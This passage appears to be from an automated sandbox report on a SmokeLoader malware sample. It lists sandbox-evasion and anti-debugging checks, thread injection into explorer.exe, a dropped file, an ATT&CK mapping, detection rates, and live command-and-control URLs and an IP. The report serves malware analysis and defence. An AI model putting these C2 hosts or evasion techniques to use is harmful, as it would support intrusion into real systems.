Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ComSpe
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}f9507e
Source: explorer.exe, 0000000B.00000003.2680300536.0000000004852000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{v
Source: explorer.exe, 0000000B.00000003.2632962015.0000000008125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@2
Source: explorer.exe, 0000000B.00000003.2628458064.000000000487E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}NWTVCDUMOB.mp3>
Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000B.00000002.2963794054.000000000817A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.000000000817A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_loc

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02C90D90 mov eax, dword ptr fs:[00000030h]	0_2_02C90D90
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02C9092B mov eax, dword ptr fs:[00000030h]	0_2_02C9092B
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02CDF365 push dword ptr fs:[00000030h]	0_2_02CDF365
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_02C604ED push dword ptr fs:[00000030h]	5_2_02C604ED
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_0477092B mov eax, dword ptr fs:[00000030h]	5_2_0477092B
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_04770D90 mov eax, dword ptr fs:[00000030h]	5_2_04770D90

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: tttcvva.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 109.175.29.39 80

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Thread created: C:\Windows\explorer.exe EIP: 8C419A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Thread created: unknown EIP: 95619A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1775341157.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanjon
Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000002.2969745207.000000000B673000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2911915797.000000000B66C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndk
Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

Code function: 0_2_00417090 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileA,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,OpenFileMappingA,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,

0_2_00417090

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	521 Security Software Discovery	Remote Services	Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	23 Virtualization/Sandbox Evasion	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
3sfCdeA1H2.exe	42%	ReversingLabs
3sfCdeA1H2.exe	38%	Virustotal	Browse
3sfCdeA1H2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\tttcvva	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tttcvva	42%	ReversingLabs
C:\Users\user\AppData\Roaming\tttcvva	38%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse
api.msn.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	Virustotal		Browse
https://aka.ms/odirmv	0%	Virustotal		Browse
http://unicea.ws/tmp/index.php	0%	Virustotal		Browse
https://api.msn.com/D	0%	Virustotal		Browse
http://nwgrus.ru/tmp/index.php	17%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://api.msn.com/X	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
http://tech-servers.in.net/tmp/index.php	2%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://api.msn.com:443/v1/news/Feed/Windows?V	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	109.175.29.39	true	true	12%, Virustotal, Browse	unknown
api.msn.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://unicea.ws/tmp/index.php	true	0%, Virustotal, Browse	unknown
http://nwgrus.ru/tmp/index.php	true	17%, Virustotal, Browse	unknown
http://tech-servers.in.net/tmp/index.php	true	2%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/odirmv	explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1776956653.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1776433497.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778850538.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/D	explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://powerpoint.office.comEM	explorer.exe, 0000000B.00000003.2677069781.000000000842C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1780555667.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.msn.com/X	explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1780555667.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://excel.office.com30#	explorer.exe, 0000000B.00000003.2670022683.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2681492107.00000000083D5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083C2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
